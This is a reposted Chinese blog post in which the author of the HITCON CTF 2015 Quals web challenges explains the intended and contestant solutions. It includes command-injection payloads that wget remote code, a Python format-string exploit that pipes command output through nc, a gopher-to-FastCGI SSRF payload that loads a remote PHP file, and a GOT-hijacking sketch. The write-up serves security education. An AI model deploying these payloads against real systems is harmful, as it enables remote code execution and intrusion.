HITCON CTF 2015 Quals Web 出題心得

admin 2019年5月8日18:56:19评论312 views字数 5392阅读17分58秒阅读模式
摘要

作者:[email protected]
Blog:http://blog.orange.tw

作者:[email protected]
Blog:http://blog.orange.tw

HITCON CTF 2015 Quals Web 出題心得

p.s. 相關代碼皆放在 Github 上,有興趣研究之同學可以先看看代碼嘗試解解看後在敘述!

寫在 HITCON CTF 2015 Quals 之後
作為出題團隊的一員,不得不說這次的難度真的不是有點高而已XD
不過就身為 DEFCON 種子賽我覺得可以說是名符其實! HITCON CTF 2015 Quals Web 出題心得

這次負責了所有的 Web 題目
私心來說都是自信之作,把自己最近研究的一些東西出成題目XD
就參賽者反應來說,讓他們在解題時覺得很難但解出後會有「原來如此」、「還可以這樣玩」的感覺是我這次主要出題的目的XD

0x01 100 BabyFirst (33 隊解)


<?php     highlight_file(__FILE__);     $dir = 'sandbox/' . $_SERVER['REMOTE_ADDR'];     if ( !file_exists($dir) )         mkdir($dir);     chdir($dir);     $args = $_GET['args'];     for ( $i=0; $i<count($args); $i++ ){         if ( !preg_match('/^/w+$/', $args[$i]) )             exit();     }     exec("/bin/orange " . implode(" ", $args)); ?> 

https://gist.github.com/orangetw/cb3487e47d7aaaea4692

作為本次 Web 最簡單的題目,純代碼分析並且只有十五行程式碼而已
在比賽開始後兩小時才有人解出

簡單使用/n就可以繞過常見正規表示式沒有match multiline的問題, 不過難點在於可以Command Injection但是指令都限制在是a-zA-Z0-9_
這也是最有趣的地方,每個隊伍的想法都不一樣所以會有很多種解法!

自己的官方解法是

mkdir orange cd orange wget HEXED_IP tar cvf payload orange php payload 

就可以任意代碼執行

從 log 中有看到其他隊伍的解法是

busybox ftpget ...   

或是

twistd telnet ...   

或是

wget HEX_IP // 給個 302 Redirect  FTP protocol 上,也是這題解法中最訝異的XD // 本來還檢查過 wget source code 想說產生的 index.html 應該不可控,結果居然到 FTP Protocol 上竟然就可以控   

總體來講也看到各種玩 Command Line 的極限XD 學到滿多用法的
最為出題者來講我覺得是最成功的一題,簡單好玩又有趣!

0x02 200 nanana (18 隊解)


https://gist.github.com/orangetw/4942d949134227eedd4c

xxd -r -p nanana.xxd > nanana 

名為 Web 實際上卻是 Pwn 的題目
只提供 binary 並無提供libcgid.so所以必須在沒有 library 的狀況下解決這題! 簡單的Format String但沒有output (sprintf),把 do_job 的 GOT 換成 system 的 PLT 地址就可以

不過唯一要注意的是得先利用stack guard覆蓋stack smashing detected的 ARGV1的方式達成任意地址洩漏把 password 給洩漏出來才比較好利用
但是因為 64-bits 且送的東西無法有 NULL Byte 所以在蓋 ARGV1的時候必須用比較迂迴的方式蓋
先使用 username 把 ARGV1最後一個蓋 NULL
再使用 username 把 ARGV1倒數第二個蓋 NULL
之後 job 蓋記憶體位置(0x601090)三個 bytes 後剩下的五個 bytes 才會剛好是 NULL 以達到任意地址讀取

詳細 Exploit 可以參考

import requests from urllib import urlencode from struct import pack, unpack  URL = 'http://54.92.88.102/cgi-bin/nanana'  def leak(address):     address = pack('I', address)     address = address.strip('/x00')      payload = {         'username': 'A'*349,          'password': 'B'*380,          'job': 'C'*392 + address     }     r = requests.get(URL+'?'+urlencode(payload))     l = r.headers['*** stack smashing detected ***']     l = l.strip(' terminated')     l = l.ljust(8, '/x00')     try:         return unpack('Q', l)     except:         return l  def e(cmd, pwd):     payload = {         'username': cmd,          'password': pwd,          'job': '/x48/x10/x60',          'action': '%198x%15$hhn'     }     print urlencode(payload)     r = requests.get(URL+'?'+urlencode(payload))    if __name__ == '__main__':      pwd = leak(0x601090)     print 'pwd @ %s' % pwd      e('id | nc 127.0.0.1 12345',pwd=pwd) 

https://gist.github.com/orangetw/583a73f58d49b1a3fc14

0x03 300 Giraffe's Coffee (16 隊解)


https://gist.github.com/orangetw/4a412fb0d49cad0c4ea3

也是代碼分析的題目

核心的概念是 PHP 中 PRNG 的預測
由於電腦很難做到真正的 "隨機",所以現在大部分隨機樹的產生都基於 PRNG 在 PHP 中 PRNG 的實現是變形的Mersenne Twister演算法

在沒有提供 seed 的下php_mt_rand會拿當前 pid 以及時間做一些運算當成種子
而這個 seed 是 32-bits 長的,所以是可破解的

有些人會使用現成的工具來解,但會發現失敗,無法主確的預測 PRNG 是因為當 PHP 在 Apache 下時是使用 prefork 的方式去執行
所以每次的連線都是從已經 fork 好的 process 中挑一個去給你使用
所以無法確定當前的 process PRNG 中 STATE 的狀態是否為第一次
以及每次連線上的 process 也不一定相同所以 STATE 狀態更無法預測
(現成工具只會算 seed 後的第一次來比對)

這點可以使用 Keep-Alive 的方式來確保連上的是同一個 process
之後再原本種子的破解上多加上往 STATE 的運算(共有 624 個 STATE) 應該就可以解了!

0x04 400 lalala (2 隊解)


一個可以給使用者上傳圖片或是提供網址幫你抓起來上傳圖片的服務
核心概念就是透過 302 redirect 去繞過限制實現 SSRF,並且再透過 SSRF 中的 gopher 去利用本地的 FastCGI prtocol 實現遠端代碼執行

在抓取圖片的時候可以使用 302 去做 SSRF
(其實很多人在研究 SSRF 的時候都忽略的 302 的妙處)

在 SSRF 中可以讀檔
(Location: file://localhost/etc/passwd)

會發現伺服器的架構是使用 Nginx + PHP-FPM
其中 PHP-FPM fastcgi protocol 是以 bind port 的方式跑在本機上

在真實世界中,只要發現對方的 PHP FastCGI 是可以外連的話那就可以拿 shell
所以使用 gopher 構造 FastCGI Protocol 訪問本機的 9001 port 就可以任意代碼執行

Location: gopher://127.0.0.1:9001/x%01%01i%13%00%08%00%00%00%01%00%00%00%00%00%00%01%04i%13%00%8B%00%00%0E%03REQUEST_METHODGET%0F%0FSCRIPT_FILENAME/_www/index.php%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On%09%26PHP_VALUEauto_prepend_file%20%3D%20http%3A//orange.tw/x%01%04i%13%00%00%00%00%01%05i%13%00%00%00%00 

(使用 PHP_ADMIN_VALUE 把allow_url_include設成on以及新增auto_prepend_file到自己的網站)

這題比較有趣的另外一個點是,如果有實作過 SSRF 搭配 gopher 的話,應該會發現
Java 中的 gopher 只能接受 0x00 - 0x7f
libcurl 中的 gopher 只能接受 0x01 - 0xff

然後本題使用 PHP 中的curl_exec,會使用到 libcurl 無法使用 NULL Byte
但是構造 FastCGI Protocol 的話非得有 NULL Byte 不可
後來去研究了一下 libcurl 的原始碼,發現是因為寫得有點問題才不能使用 NULL Byte
所以送了一個 commit 過去還被接受了...XD

https://github.com/bagder/curl/commit/5bf36ea30d38b9e00029180ddbab73cab94a2195

所以現在新版本的 libcurl / curl 應該 gopher 都可以使用 NULL Byte 了XD

0x05 500 Use-After-FLEE (1 隊解)(只有 PPP 解出)


身為 Web 最難題XD
許多時候,在做滲透測試時都會遇到,打進一台虛擬主機(hosting)後要去訪問同主機上的其他網站會被open_basedir以及disable_functions限制住

但 PHP 在歷史上出現過了許許多多的 Memory 上的洞,這題使用到的就是其中一個
( 出題時 Ubuntu apt-get 預設安裝的 PHP 還是有洞,不過寫這篇文章時好像已經修了XD )

漏洞 PoC 的話可參考 80vul 的 PHP Codz Hacking
不過只有 PoC HITCON CTF 2015 Quals Web 出題心得

https://github.com/80vul/phpcodz/blob/master/research/pch-034.md

使用 Use-After-Free 去繞過上面限制,說的好像很簡單,不過在現今作業系統中有很多的保護你必須面對

  1. DEP
  2. FULL ASLR
  3. PIE (Apache 預設全開)
  4. FULL RELRO (Apache 預設全開)
  5. 由於環境在 Apache + mod_php 上,PHP 是以 Library 的形式被載入到 Apache 中,所以再利用難度上會增加(純 CLI 其實很容易 Exploit),例如要自己處理 Parsing ELF 的動作XD

不過 PPP 不愧是最強隊伍在比賽結束前一個半小時解出,也是唯一一隊解出的隊伍!
不過有點小遺憾的是,因為比賽平台都在 EC2 的 Ubuntu 14.04 64-bits 上,所以對於 libc 的 offset 他們直接拿其他 Pwn 題目的 libc offset 而不是透過算 STRTAB, SYMTAB, JMPREL 來把 offset 找出 HITCON CTF 2015 Quals Web 出題心得

其中 PPP 中 Ricky 的 writeup

https://github.com/pwning/public-writeup/blob/master/hitcon2015/web500-use-after-flee/exploit.php

其中 Ricky 的利用是把 ZVAL 結構中 handler 換成 system 的位置並且這個 ZVAL 的型態宣告成 OBJECT 並且 refcount 為 0

struct _zval_struct {   zvalue_value value;   zend_uint refcount__gc;   zend_uchar type;   zend_uchar is_ref__gc; }; 

這樣 PHP 內部在處理時發現引用為 0 時會自動做 destruct 把並且把 ZVAL 當成參數丟給 handler
這時有 8 bytes 的指令長度限制可以用(所以 Ricky 使用sh /*/a;的做法來執行指令)
不過如果在 32-bits 下就變成 4 bytes 的長度限制幾乎無法利用XD

比較優雅的做法可以把 GOT Hijacking 把 fopen 換成 system 之後呼叫 fopen 就可以任意指令執行

write($open_got, $system_address); fopen("| $cmd", "r"); 

有興趣的同學可以嘗試寫寫看,並且想辦法把 Exploit 寫到完美! HITCON CTF 2015 Quals Web 出題心得

寫到這裡
在 Web Security 的領域上有太多太多的 tricks 以及問題等待著我們去解決
身為一個 Web 狗,我很驕傲 HITCON CTF 2015 Quals Web 出題心得

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2019年5月8日18:56:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HITCON CTF 2015 Quals Web 出題心得https://cn-sec.com/archives/56817.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息